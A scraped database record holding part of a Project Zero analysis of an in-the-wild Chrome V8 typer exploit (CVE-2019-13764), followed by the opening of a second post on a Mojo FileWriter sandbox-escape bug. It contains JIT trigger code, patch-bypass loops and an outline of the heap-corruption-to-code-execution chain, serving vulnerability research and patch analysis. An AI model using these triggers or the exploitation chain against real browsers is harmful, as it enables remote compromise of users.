When the argument is known to be a non-negative integer constant no larger than kElementLoopUnrollLimit (16), the compiler inlines the array creation procedure and unrolls the element initialization loop. ReduceJSCreateArray doesn’t rely on the constant-folding reducer and implements its own less strict equivalent that just compares the upper and lower bounds of the inferred type. Unfortunately, even after folding the function keeps using the original argument node. The folded value is employed during initialization of the backing store, while the length property of the array is set to the original node. This means that if we pass the value we obtained at step five to the constructor, it will return an array with a negative length and a backing store that can fit 13 elements. Given that bounds checks are implemented as unsigned comparisons, the crafted array will allow us to access data well past its end.
In fact, any positive value bigger than its predicted version would work as well.

The rest of the trigger function is provided below:

```javascript
  [...]
  corrupted_array = Array(i);
  corrupted_array[0] = 1.1;
  ptr_leak_array = [wasm_module, array_buffer, [...],
                    wasm_module, array_buffer];
  extra_array = [13.37, [...], 13.37, 1.234];
  return [corrupted_array, ptr_leak_array, extra_array];
}
```

The attacker forces TurboFan to put the data required for further exploitation right next to the corrupted array and to use the double element type for the backing store, as it’s the most convenient type for dealing with out-of-bounds data in the V8 heap.

From this point on, the exploit follows the same algorithm that public V8 exploits have been following for several years:

 1. Locate the required pointers and object fields through pattern-matching.
 2. Construct an arbitrary memory access primitive using an extra JavaScript array and ArrayBuffer.
 3. Follow the pointer chain from a WebAssembly module instance to locate a writable and executable memory page.
 4. Overwrite the body of a WebAssembly function inside the page with the attacker’s payload.
 5. Finally, execute it.

The contents of the payload, which is about half a megabyte in size, will be discussed in detail in a subsequent blog post.

Given that the vast majority of Chrome exploits we have seen at Project Zero come from either exploit competitions or VRP submissions, the most striking difference this exploit has demonstrated lies in its focus on stability and reliability. Here are some examples. Almost the entire exploit is executed inside a web worker, which means it has a separate JavaScript environment and runs in its own thread. This greatly reduces the chance of the garbage collector causing an accidental crash due to the inconsistent heap state.
The main thread part is only responsible for restarting the worker in case of failure and passing status information to the attacker’s server. The exploit attempts to further reduce the time window for GC crashes by ensuring that every corrupted field is restored to the original value as soon as possible. It also employs the OOB access primitive early on to verify the processor architecture information provided in the user agent header. Finally, the author has clearly aimed to keep the number of hard-coded constants to a minimum. Despite supporting a wide range of Chrome versions, the exploit relies on a single version-dependent offset, namely, the offset in the WASM instance to the executable page pointer.

### Patch 1

Even though there’s evidence this vulnerability has been originally used as a 0-day, by the time we obtained the exploit, it had already been fixed. The issue was [reported to Chrome](<https://bugs.chromium.org/p/chromium/issues/detail?id=1028863>) by security researchers Soyeon Park and Wen Xu in November 2019 and was assigned CVE-2019-13764. The proof of concept provided in the report is shown below:

```javascript
function write(begin, end, step) {
  for (var i = begin; i >= end; i += step) {
    step = end - begin;
    begin >>>= 805306382;
  }
}
var buffer = new ArrayBuffer(16384);
var view = new Uint32Array(buffer);
for (let i = 0; i < 10000; i++) {
  write(Infinity, 1, view[65536], 1);
}
```

As the reader can see, it’s not the most straightforward way to trigger the issue. The code resembles fuzzer output, and the reporters confirmed that the bug had been found through fuzzing.
Given the available evidence, we’re fully confident that it was an independent discovery (sometimes referred to as a “bug collision”).

Since the proof of concept could only lead to a SIGTRAP crash, and the reporters hadn’t demonstrated, for example, a way to trigger memory corruption, it was initially considered a low-severity issue by the V8 engineers. After an internal discussion, however, the V8 team raised the severity rating to high.

In the light of the in-the-wild exploitation evidence, we decided to give [the fix](<https://chromium.googlesource.com/v8/v8.git/+/b8b6075021ade0969c6b8de9459cd34163f7dbe1>), which had introduced an explicit check for the NaN case, a thorough examination:

```cpp
  [...]
  const bool both_types_integer =
      initial_type.Is(typer_->cache_->kInteger) &&
      increment_type.Is(typer_->cache_->kInteger);
  bool maybe_nan = false;
  // The addition or subtraction could still produce a NaN, if the integer
  // ranges touch infinity.
  if (both_types_integer) {
    Type resultant_type =
        (arithmetic_type == InductionVariable::ArithmeticType::kAddition)
            ? typer_->operation_typer()->NumberAdd(initial_type,
                                                   increment_type)
            : typer_->operation_typer()->NumberSubtract(initial_type,
                                                        increment_type);
    maybe_nan = resultant_type.Maybe(Type::NaN());
  }
  // We only handle integer induction variables (otherwise ranges
  // do not apply and we cannot do anything).
  if (!both_types_integer || maybe_nan) {
  [...]
```

The code makes the assumption that the loop variable may only become NaN if the sum or difference of `initial` and `increment` is NaN. At first sight, it seems like a fair assumption. The issue arises from the fact that the value of `increment` can be changed from inside the loop, which isn’t obvious from the exploit but is demonstrated in the proof of concept sent to Chrome. The typer takes these changes into account and reflects them in `increment`’s computed type.
Therefore, the attacker can, for example, add a negative increment to `i` until the latter becomes -Infinity, then change the sign of `increment` and force the loop to produce NaN once more, as demonstrated by the code below:

```javascript
var increment = -Infinity;
var k = 0;
for (var i = 0; i < 1; i += increment) {
  if (i == -Infinity) {
    increment = +Infinity;
  }
  if (++k > 10) {
    break;
  }
}
```

Thus, to “revive” the entire exploit, the attacker only needs to change a couple of lines in `trigger`.

### Patch 2

The discovered variant was [reported to Chrome](<https://bugs.chromium.org/p/chromium/issues/detail?id=1051017>) in February along with the exploitation technique found in the exploit. This time [the patch](<https://chromium.googlesource.com/v8/v8.git/+/a2e971c56d1c46f7c71ccaf33057057308cc8484>) took a more conservative approach and made the function bail out as soon as the typer detects that `increment` can be Infinity.

```cpp
  [...]
  // If we do not have enough type information for the initial value or
  // the increment, just return the initial value's type.
  if (initial_type.IsNone() ||
      increment_type.Is(typer_->cache_->kSingletonZero)) {
    return initial_type;
  }
  // We only handle integer induction variables (otherwise ranges do not
  // apply and we cannot do anything). Moreover, we don't support infinities
  // in {increment_type} because the induction variable can become NaN
  // through addition/subtraction of opposing infinities.
  if (!initial_type.Is(typer_->cache_->kInteger) ||
      !increment_type.Is(typer_->cache_->kInteger) ||
      increment_type.Min() == -V8_INFINITY ||
      increment_type.Max() == +V8_INFINITY) {
  [...]
```
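To make the induction variable rule, the two patches and the narrowing chain from the Exploitation section concrete, here is an added worked example written for this page; it is not code from the Project Zero post or from V8. It re-implements, in plain JavaScript, a simplified version of the increasing-loop branch of TypeInductionVariablePhi together with the NaN check Patch 1 added and the infinity check Patch 2 added, runs the one-line trigger loop and the Patch 1 bypass loop with ordinary interpreter semantics, and models the x64 representation changes of steps two to five (the CVTTSD2SI indefinite integer, then int32 truncation) so that the actual value and the inferred range can be compared side by side. The helper names (`typeInductionVariable`, `narrowingChain`, `cvttsd2si`), the `{min, max}` range objects and the interval arithmetic are assumptions of this illustration; V8's typer works on graph nodes and handles many more cases (decreasing loops, singleton-zero increments, non-integer types) that are left out here. Running it under a current Node.js miscompiles nothing; the point is to see why NaN escapes each version of the rule and how a NaN becomes the small negative int32 the exploit feeds to `Array()`.

```javascript
// Added example (not V8 or Project Zero code): a simplified model of the
// induction-variable typing rule, the checks Patch 1 and Patch 2 added, and
// the x64 representation changes of steps two to five of the exploit.
// Helper names and the interval arithmetic are assumptions for illustration.
const INF = Infinity;

// A "type" is an integer range {min, max} (infinities allowed, NaN excluded,
// like the typer's Integer type) or null for the conservative fallback path.
const range = (min, max) => ({ min, max });
const inRange = (t, v) => t !== null && !Number.isNaN(v) && v >= t.min && v <= t.max;

// Types the phi of `for (i = initial; i < bound; i += increment)` for an
// increasing loop. `patch` selects the original rule (0), Patch 1 (1) or
// Patch 2 (2); `bound` is { max, strict }.
function typeInductionVariable(initial, increment, bound, patch) {
  if (patch >= 1) {
    // Patch 1: bail out if initial + increment itself could be NaN.
    const sums = [initial.min + increment.min, initial.min + increment.max,
                  initial.max + increment.min, initial.max + increment.max];
    if (sums.some(Number.isNaN)) return null;
  }
  if (patch >= 2 && (increment.min === -INF || increment.max === INF)) {
    return null; // Patch 2: no infinities in the increment at all
  }
  if (increment.min < 0 && increment.max > 0) return range(-INF, INF); // "Integer"
  if (increment.max <= 0) return null; // decreasing loops are not modelled here
  // Increasing loop: lower bound from initial, upper bound from the loop
  // condition plus the increment's maximum. std::min(max, NaN) in the C++
  // keeps max, so a NaN candidate is silently discarded.
  let max = INF;
  const candidate = bound.max - (bound.strict ? 1 : 0) + increment.max;
  if (!Number.isNaN(candidate)) max = Math.min(max, candidate);
  max = Math.max(max, initial.max);
  return range(initial.min, max);
}

// The loops from the post, executed with plain interpreter semantics.
function runOriginalTrigger() {
  var guard = 0;
  for (var i = -INF; i < 0; i += INF) { if (++guard > 20) break; }
  return i; // -Infinity + Infinity: NaN after the first iteration
}

function runPatch1Bypass() {
  var increment = -INF, k = 0;
  for (var i = 0; i < 1; i += increment) {
    if (i === -INF) increment = +INF; // increment is typed (-inf, +inf)
    if (++k > 10) break;
  }
  return i; // NaN again, although no single initial + increment is NaN
}

// CVTTSD2SI yields the "indefinite integer" for NaN or out-of-range input.
function cvttsd2si(x) {
  if (Number.isNaN(x) || x >= 2 ** 63 || x < -(2 ** 63)) return -(2n ** 63n);
  return BigInt(Math.trunc(x));
}

// Steps one to five of the exploit: `actual` follows the machine
// representation chosen at each step, `inferred` follows the typer's ranges.
function narrowingChain(iDouble) {
  // step one: Math.max(i, 0x100000800) gives the range a lower bound;
  // a NaN input simply propagates through the double computation
  let inferred = range(0x100000800, INF);
  const actualD = Math.max(iDouble, 0x100000800);
  // step two: Math.min(0x100000801, i); the range now fits int64, so the
  // value is converted with CVTTSD2SI
  inferred = range(inferred.min, Math.min(inferred.max, 0x100000801));
  const actual64 = cvttsd2si(Math.min(0x100000801, actualD));
  // step three: i -= 0x1000007fa; the result fits int32, so the high word is
  // dropped (equal to subtracting 0x100000000 for in-range values) and only
  // 0x7fa is subtracted from the low word
  inferred = range(inferred.min - 0x1000007fa, inferred.max - 0x1000007fa);
  let actual32 = Number(BigInt.asIntN(32, actual64)) - 0x7fa;
  // step four: i >>= 1
  inferred = range(inferred.min >> 1, inferred.max >> 1);
  actual32 >>= 1;
  // step five: i += 10
  inferred = range(inferred.min + 10, inferred.max + 10);
  actual32 += 10;
  return { actual: actual32, inferred };
}

function demo() {
  const original = [range(-INF, -INF), range(INF, INF), { max: 0, strict: true }];
  const bypass = [range(0, 0), range(-INF, INF), { max: 1, strict: true }];
  return {
    original: {
      actual: runOriginalTrigger(),                    // NaN
      prePatch: typeInductionVariable(...original, 0), // (-inf, +inf): excludes NaN
      patch1: typeInductionVariable(...original, 1),   // null: bails out
    },
    bypass: {
      actual: runPatch1Bypass(),                       // NaN
      patch1: typeInductionVariable(...bypass, 1),     // still typed Integer
      patch2: typeInductionVariable(...bypass, 2),     // null: bails out
    },
    chain: narrowingChain(NaN),                        // actual -1011, inferred 13
  };
}

console.log(demo());
```

Run it with `node` and read the output of `demo()`: `original.prePatch` is the open range that excludes the NaN the loop actually produces, `original.patch1` and `bypass.patch2` are the bail-outs, `bypass.patch1` is the Integer type Patch 1 still assigns to a loop that ends in NaN, and `chain` shows -1011 against an inferred 13, the mismatch that ReduceJSCreateArray turned into an array with a negative length. Calling `narrowingChain(0x100000800)` with a genuine in-range value yields 13 on both sides, which is the sanity check that the model reproduces the compiler's reasoning rather than just the bug.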
Additionally, ReduceJSCreateArray [was updated](<https://chromium.googlesource.com/v8/v8.git/+/6516b1ccbe6f549d2aa2fe24510f73eb3a33b41a>) to always use the same value for both the length property and the backing store capacity, thus rendering the reported exploitation technique useless.

Unfortunately, the new patch contained an unintended change that introduced another security issue. If we look at [the source code](<https://chromium.googlesource.com/v8/v8.git/+/0da7ca8781c6c7ec852bef845b72ca7f212cdc23/src/compiler/typer.cc#845>) of TypeInductionVariablePhi before the patches, we find that it checks whether the type of `increment` is limited to the constant zero. In this case, it assigns the type of `initial` to the induction variable. The second patch moved the check above the line that ensures `initial` is an integer. In JavaScript, however, adding or subtracting zero doesn’t necessarily preserve the type, for example:

| Expression | Result |
| --- | --- |
| -0 + 0 | 0 |
| [string] - 0 | [number] |
| [object] + 0 | [string] |

(The first row is the IEEE 754 rule that the sum of two zeros of opposite sign is +0, so a phi typed as -0 can actually hold +0.) As a result, the patched function provides us with an even wider choice of possible “type confusions”.

It was considered worthwhile to examine how difficult it would be to find a replacement for the ReduceJSCreateArray technique and exploit the new issue. The task turned out to be a lot easier than initially expected because we soon found [this excellent blog post](<https://doar-e.github.io/blog/2019/05/09/circumventing-chromes-hardening-of-typer-bugs/>) written by Jeremy Fetiveau, where he describes a way to bypass the initial bounds check elimination hardening.
In short, depending on whether the engine has encountered an out-of-bounds element access attempt during the execution of a function in the interpreter, it instructs the compiler to emit either the CheckBounds or the NumberLessThan node, and only the former is covered by the hardening. Consequently, the attacker just needs to make sure that the function attempts to access a non-existent array element in one of the first few invocations.

We find it interesting that even though this equally powerful and convenient technique has been publicly available since last May, the attacker has chosen to rely on their own method. It is conceivable that the exploit had been developed even before the blog post came out.

Once again, the technique requires an integer with a miscalculated range, so the revamped trigger function mostly consists of various type transformations:

```javascript
function trigger(arg) {
  // Initially:
  // actual = 1, inferred = any
  var k = 0;
  arg = arg | 0;
  // After step one:
  // actual = 1, inferred = [-0x80000000, 0x7fffffff]
  arg = Math.min(arg, 2);
  // After step two:
  // actual = 1, inferred = [-0x80000000, 2]
  arg = Math.max(arg, 1);
  // After step three:
  // actual = 1, inferred = [1, 2]
  if (arg == 1) {
    arg = "30";
  }
  // After step four:
  // actual = string{30}, inferred = [1, 2] or string{30}
  for (var i = arg; i < 0x1000; i -= 0) {
    if (++k > 1) {
      break;
    }
  }
  // After step five:
  // actual = number{30}, inferred = [1, 2] or string{30}
  i += 1;
  // After step six:
  // actual = 31, inferred = [2, 3]
  i >>= 1;
  // After step seven:
  // actual = 15, inferred = 1
  i += 2;
  // After step eight:
  // actual = 17, inferred = 3
  i >>= 1;
  // After step nine:
  // actual = 8, inferred = 1
  var array = [0.1, 0.1, 0.1, 0.1];
  return [array[i], array];
}
```

The mismatch between the number 30 and the string “30” occurs in step five.
The next operation is represented by the SpeculativeSafeIntegerAdd node. The typer is aware that whenever this node encounters a non-number argument, it immediately triggers deoptimization. Hence, all non-number elements of the argument type can be ignored. The unexpected integer value, which obviously doesn’t cause the deoptimization, enables us to generate an erroneous range. Eventually, the compiler eliminates the NumberLessThan node, which is supposed to protect the element access in the last line, based on the observed range.

### Patch 3

Soon after we had identified the regression, the V8 team landed [a patch](<https://chromium.googlesource.com/v8/v8.git/+/68099bffaca0b4cfa10eb0178606aa55fd85d8ef>) that removed the vulnerable code branch. They also took a number of additional hardening measures, for example:

 * Extended [element access hardening](<https://chromium.googlesource.com/v8/v8.git/+/fa5fc748e53ad9d3ca44050d07659e858dbffd94>), which now prevents the abuse of NumberLessThan nodes.
 * Discovered and [fixed a similar problem](<https://chromium.googlesource.com/v8/v8.git/+/c85aa83087e7146281a95369cadf943ef78bf321>) with the elimination of MaybeGrowFastElements. Under certain conditions, this node, which may resize the backing store of a given array, is placed before StoreElement to ensure the array can fit the element. Consequently, the elimination of the node could allow an attacker to write data past the end of the backing store.
 * [Implemented a verifier](<https://chromium.googlesource.com/v8/v8.git/+/e440eda4ad9bfd8983c9896de574556e8eaee406>) for induction variables that validates the computed type against the more conservative regular phi typing.

Furthermore, the V8 engineers have been working on [a feature](<https://chromium.googlesource.com/v8/v8.git/+/2e82ead865d088890bbfd14abfb22b8055b35394>) that allows TurboFan to insert runtime type checks into generated code.
The feature should make fuzzing for typer issues much more efficient.

### Conclusion

This blog post is meant to provide insight into the complexity of type tracking in JavaScript. The number of obscure rules and constraints an engineer has to bear in mind while working on the feature almost inevitably leads to errors, and, quite often, even the slightest issue in the typer is enough to build a powerful and reliable exploit.

Also, the reader is probably familiar with the hypothesis of an enormous disparity between the state of public and private offensive security research. The fact that we’ve discovered a rather sophisticated attacker who has exploited a vulnerability in a class that has been under the scrutiny of the wider security community for at least a couple of years suggests that there’s nevertheless a certain overlap. Moreover, we were especially pleased to see a bug collision between a VRP submission and an in-the-wild 0-day exploit.

This is part 2 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild.
To continue reading, see [In The Wild Part 3: Chrome Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-exploits.html>).
", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "googleprojectzero", "title": "\nIn-the-Wild Series: Chrome Infinity Bug\n", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13764"], "modified": "2021-01-12T00:00:00", "id": "GOOGLEPROJECTZERO:3397E6EF67D4C71C395ED0244548698A", "href": "https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-06T01:57:02", "description": "
Posted by Mark Brand, Exploit Technique Archaeologist.

## Introduction

After discovering a [collection](<https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=-status%3AInvalid+%22MojoJS%22+finder%3Amarkbrand&colspec=ID+Status+Restrict+Finder+Reported+Remaining+CVE+Vendor+Product+Summary&cells=ids>) of possible sandbox escape vulnerabilities in Chrome, it seemed worthwhile to
[exploit](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1755#c3>) one of these issues as a full-chain exploit together with a renderer vulnerability to get a better understanding of the mechanics required for a modern Chrome exploit. Considering the available bugs, the most likely appeared to be [issue 1755](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1755>), a use-after-free with parallels to classic Javascript engine callback bugs. This is a good candidate because of the high level of control the attacker has both over the lifetime of the free’d object, and over the timing of the later use of the object.

Apologies in advance for glossing over a lot of details about how the Mojo IPC mechanisms function - there’ll hopefully be some future blogposts explaining in more detail how the current Chrome sandbox interfaces look, but there’s a lot to explain!

For the rest of this blog post, we’ll be considering the last stable 64-bit release of Desktop Chrome for Windows before this issue was fixed, 71.0.3578.98.

## Getting started

One of the most interesting things that we noticed during our research into the Chrome Mojo IPC layer is that it’s actually possible to make IPC calls directly from [Javascript](<https://chromium.googlesource.com/chromium/src/+/master/mojo/public/js/README.md>) in Chrome! Passing the command line flag ‘--enable-blink-features=MojoJS’ to Chrome will enable this - and we used this feature to implement a Mojo fuzzer, which found some of the bugs reported.

Knowing about this feature, the cleanest way to implement a full Chrome chain would be to use a renderer exploit to enable these bindings in the running renderer, and then do our privilege elevation from Javascript!

## Exploiting the renderer

[_tsuro](<https://twitter.com/_tsuro>) happened to have been working on an exploit for CVE-2019-5782, a nice bug in the v8 typer that was discovered by [SOrryMybad](<https://twitter.com/S0rryMybad>) and used at the Tian Fu Cup. I believe they have an upcoming blog post on the issue, so I’ll leave the details to them.

The bug resulted from incorrectly estimating the possible range of `arguments.length`; this can then be leveraged together with the (BCE) Bounds-Check-Elimination pass in the JIT. Exploitation is very similar to other typer bugs - you can find the exploit in ‘many_args.js’. Note that as a result of _tsuro’s work, the v8 team [have removed the BCE optimisation](<https://bugs.chromium.org/p/v8/issues/detail?id=8806>) to make it harder to exploit such issues in the typer!

The important thing here is that we’ll need to have a stable exploit - in order to launch the sandbox escape, we need to enable the Mojo bindings; and the easiest way to do this needs us to reload the main frame, which will mean that any objects we leave in a corrupted state will become fair game for garbage collection.

## Talking to the Browser Process

Looking through the Chrome source code, we can see that the Mojo bindings are added to the Javascript context in [RenderFrameImpl::DidCreateScriptContext](<https://cs.chromium.org/chromium/src/content/renderer/render_frame_impl.cc?rcl=8095e5d9d219ceff1aab5d00aaec59d629d50270&l=5453>), based on the member variable enabled_bindings_. So, to mimic the command line flag we can use our read/write to set that value to BINDINGS_POLICY_MOJO_WEB_UI, and force the creation of a new ScriptContext for the main frame, and we should have access to the bindings!

It’s slightly painful to get hold of the RenderFrameImpl for the current frame, but by following a chain of pointers from the global context object we can locate chrome_child.dll, and find the global `g_frame_map`, which is a map from blink::Frame pointers to RenderFrameImpl pointers. For the purposes of this exploit, we assume that there is only a single entry in this map; but it would be simple to extend this to find the right one. It’s then trivial to set the correct flag and reload the page - see `enable_mojo.js` for the implementation.

Note that Chrome randomizes the IPC ordinals at build time, so in addition to enabling the bindings, we also need to find the correct ordinals for every IPC method that we want to call. This can be resolved in a few minutes of time in a disassembler of your choice; given that the renderer needs to be able to call these IPC methods, this is just a slightly annoying obfuscation that we could engineer around if we were trying to support more Chrome builds, but for the one version we’re supporting here it’s sufficient to modify the handful of javascript bindings we need:

```javascript
var kBlob_GetInternalUUID_Name = 0x2538AE26;

var kBlobRegistry_Register_Name = 0x2158E98A;
var kBlobRegistry_RegisterFromStream_Name = 0x719E4F82;

var kFileSystemManager_Open_Name = 0x305E02BE;
var kFileSystemManager_CreateWriter_Name = 0x63B8D2A6;

var kFileWriter_Write_Name = 0x64D4FC1C;
```

## The bug

So we’ve got access to the IPC interfaces from Javascript - what now?

The bug that we’re looking at is an issue in the implementation of the FileWriter interface of the [FileSystem API](<https://www.html5rocks.com/en/tutorials/file/filesystem/>). This is the interface description for the FileWriter interface, which is an IPC endpoint vended by the privileged browser process to the unprivileged renderer process to allow the renderer to perform brokered file writes to special sandboxed filesystems:

```
// Interface provided to the renderer to let a renderer write data to a file.
interface FileWriter {
  // Write data from |blob| to the given |position| in the file being written
  // to. Returns whether the operation succeeded and if so how many bytes were
  // written.
  // TODO(mek): This might need some way of reporting progress events back to
  // the renderer.
  Write(uint64 position, Blob blob) => (mojo_base.mojom.FileError result,
                                        uint64 bytes_written);

  // Write data from |stream| to the given |position| in the file being written
  // to. Returns whether the operation succeeded and if so how many bytes were
  // written.
  // TODO(mek): This might need some way of reporting progress events back to
  // the renderer.
  WriteStream(uint64 position, handle<data_pipe_consumer> stream) =>
      (mojo_base.mojom.FileError result, uint64 bytes_written);

  // Changes the length of the file to be |length|. If |length| is larger than
  // the current size of the file, the file will be extended, and the extended
  // part is filled with null bytes.
  Truncate(uint64 length) => (mojo_base.mojom.FileError result);
};
```

The vulnerability was in the implementation of the first method, Write. However, before we can properly understand the bug, we need to understand the lifetime of the FileWriter objects. The renderer can request a FileWriter instance by using one of the methods in the FileSystemManager interface:

```
// Interface provided by the browser to the renderer to carry out filesystem
// operations. All [Sync] methods should only be called synchronously on worker
// threads (and asynchronously otherwise).
interface FileSystemManager {
  // ...

  // Creates a writer for the given file at |file_path|.
  CreateWriter(url.mojom.Url file_path) =>
      (mojo_base.mojom.FileError result,
       blink.mojom.FileWriter? writer);

  // ...
};
```

The implementation of that function can be found [here](<https://chromium.googlesource.com/chromium/src/+/43be2d668342e8b1dd83cb1a2b9ebfa86474ba45/content/browser/fileapi/file_system_manager_impl.cc#573>):

```cpp
void FileSystemManagerImpl::CreateWriter(const GURL& file_path,
                                         CreateWriterCallback callback) {
  DCHECK_CURRENTLY_ON(BrowserThread::IO);

  FileSystemURL url(context_->CrackURL(file_path));
  base::Optional<base::File::Error> opt_error = ValidateFileSystemURL(url);
  if (opt_error) {
    std::move(callback).Run(opt_error.value(), nullptr);
    return;
  }
  if (!security_policy_->CanWriteFileSystemFile(process_id_, url)) {
    std::move(callback).Run(base::File::FILE_ERROR_SECURITY, nullptr);
    return;
  }

  blink::mojom::FileWriterPtr writer;
  mojo::MakeStrongBinding(std::make_unique<storage::FileWriterImpl>(
                              url, context_->CreateFileSystemOperationRunner(),
                              blob_storage_context_->context()->AsWeakPtr()),
                          MakeRequest(&writer));
  std::move(callback).Run(base::File::FILE_OK, std::move(writer));
}
```

The implication here is that if everything goes correctly, we’re returning a std::unique_ptr<storage::FileWriterImpl> bound to a mojo::StrongBinding.
A strong binding means that the lifetime of the object is bound to the lifetime of the Mojo interface pointer - this means that the other side of the connection can control the lifetime of the object - and at any point where the code in storage::FileWriterImpl yields control of the [sequence](<https://chromium.googlesource.com/chromium/src/+/lkgr/docs/threading_and_tasks.md#posting-a-sequenced-task>) associated with that binding, the connection could be closed and the instance could be free’d.

This gives us a handle to the blink::mojom::FileWriter Mojo interface described [here](<https://cs.chromium.org/chromium/src/third_party/blink/public/mojom/filesystem/file_writer.mojom?type=cs&q=FileWriter+f:mojom$&sq=package:chromium&g=0&l=11>); the function of interest to us is the Write method, which has a handle to a blink::mojom::Blob as one of its parameters. We’ll look at this Blob interface again shortly.

With this in mind, it’s time to look at the vulnerable [function](<https://chromium.googlesource.com/chromium/src/+/975798170a17a651cb399bdc030b9991cf2c7b3a/storage/browser/fileapi/file_writer_impl.cc#26>).

```cpp
void FileWriterImpl::Write(uint64_t position,
                           blink::mojom::BlobPtr blob,
                           WriteCallback callback) {
  blob_context_->GetBlobDataFromBlobPtr(
      std::move(blob),
      base::BindOnce(&FileWriterImpl::DoWrite, base::Unretained(this),
                     std::move(callback), position));
}
```

Now, it’s not immediately obvious that there’s an issue here; but in the Chrome codebase instances of base::Unretained which aren’t immediately obviously correct are often worth further investigation (this creates an unchecked, unowned reference - see Chrome [documentation](<https://www.chromium.org/developers/coding-style/important-abstractions-and-data-structures>)). So; this code can only be safe if GetBlobDataFromBlobPtr always synchronously calls the callback, or if destroying this will ensure that the callback is never called. Since blob_context_ isn’t owned by this, we need to look at the [implementation](<https://chromium.googlesource.com/chromium/src/+/4d526b4f33f813b0ccd3d87a068f26b702d6aff8/storage/browser/blob/blob_storage_context.cc#80>) of GetBlobDataFromBlobPtr, and the way in which it uses callback:

```cpp
void BlobStorageContext::GetBlobDataFromBlobPtr(
    blink::mojom::BlobPtr blob,
    base::OnceCallback<void(std::unique_ptr<BlobDataHandle>)> callback) {
  DCHECK(blob);
  blink::mojom::Blob* raw_blob = blob.get();
  raw_blob->GetInternalUUID(mojo::WrapCallbackWithDefaultInvokeIfNotRun(
      base::BindOnce(
          [](blink::mojom::BlobPtr, base::WeakPtr<BlobStorageContext> context,
             base::OnceCallback<void(std::unique_ptr<BlobDataHandle>)> callback,
             const std::string& uuid) {
            if (!context || uuid.empty()) {
              std::move(callback).Run(nullptr);
              return;
            }
            std::move(callback).Run(context->GetBlobDataFromUUID(uuid));
          },
          std::move(blob), AsWeakPtr(), std::move(callback)),
      ""));
}
```

The code above is calling an asynchronous Mojo IPC method GetInternalUUID on the blob parameter that’s passed to it, and then (in a callback) when that method returns it’s using the returned UUID to find the associated blob data (GetBlobDataFromUUID), and calling the callback parameter with this data as an argument.

We can see that the callback is passed into the return callback for an asynchronous Mojo function exposed by the Blob [interface](<https://cs.chromium.org/chromium/src/third_party/blink/public/mojom/blob/blob.mojom>):

```
// This interface provides access to a blob in the blob system.
interface Blob {
  // Creates a copy of this Blob reference.
  Clone(Blob& blob);

  // Creates a reference to this Blob as a DataPipeGetter.
  AsDataPipeGetter(network.mojom.DataPipeGetter& data_pipe_getter);

  // Causes the entire contents of this blob to be written into the given data
  // pipe. An optional BlobReaderClient will be informed of the result of the
  // read operation.
  ReadAll(handle<data_pipe_producer> pipe, BlobReaderClient? client);

  // Causes a subrange of the contents of this blob to be written into the
  // given data pipe. If |length| is -1 (uint64_t max), the range's end is
  // unbounded so the entire contents are read starting at |offset|. An
  // optional BlobReaderClient will be informed of the result of the read
  // operation.
  ReadRange(uint64 offset, uint64 length, handle<data_pipe_producer> pipe,
            BlobReaderClient? client);

  // Reads the side-data (if any) associated with this blob. This is the same
  // data that would be passed to OnReceivedCachedMetadata if you were reading
  // this blob through a blob URL.
  ReadSideData() => (array<uint8>? data);

  // This method is an implementation detail of the blob system. You should not
  // ever need to call it directly.
  // This returns the internal UUID of the blob, used by the blob system to
  // identify the blob.
  GetInternalUUID() => (string uuid);
};
```

This means that we can provide an implementation of this Blob interface hosted in the renderer process; pass an instance of that implementation into the FileWriter interface’s Write method, and we’ll get a callback from the browser process to the renderer process during the execution of GetBlobDataFromBlobPtr, during which we can destroy the FileWriter object.
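To make the lifetime problem concrete, here is an added model of the sequence just described (my own code, not Chromium's): a writer owned by a strong binding issues an asynchronous UUID lookup, the peer closes the binding before the reply is processed, and the queued continuation then runs. It contrasts the raw-`this` capture (the `base::Unretained(this)` shape) with a weak-reference capture (the role `base::WeakPtr` plays in Chromium) and also runs the control case where the peer keeps the binding open; `Sequence`, `FileWriterModel`, the live-object set standing in for ASan, and the `"aaaa"` reply are all constructed stand-ins.

```cpp
#include <cstdio>
#include <functional>
#include <memory>
#include <queue>
#include <set>
#include <string>
#include <utility>

// Constructed model (not Chromium code) of the FileWriterImpl::Write lifetime
// issue: an owned object issues an async request, the peer closes the strong
// binding that owns it, and the reply continuation fires afterwards.

// Stand-in for the browser sequence the binding runs on: tasks posted here run
// later, in order, when the sequence is pumped.
struct Sequence {
  std::queue<std::function<void()>> tasks;
  void Post(std::function<void()> task) { tasks.push(std::move(task)); }
  void RunAll() {
    while (!tasks.empty()) {
      auto task = std::move(tasks.front());
      tasks.pop();
      task();
    }
  }
};

// What the reply continuation observed when it finally ran.
enum class Outcome { kPending, kWritten, kDroppedSafely, kDanglingUse };

// Addresses of writers that are still alive. The raw-pointer path consults this
// before touching `self`, so a dangling use is reported rather than
// dereferenced (a stand-in for what ASan would flag as a use-after-free).
static std::set<const void*> g_live_writers;

class FileWriterModel : public std::enable_shared_from_this<FileWriterModel> {
 public:
  explicit FileWriterModel(Sequence& seq) : seq_(seq) { g_live_writers.insert(this); }
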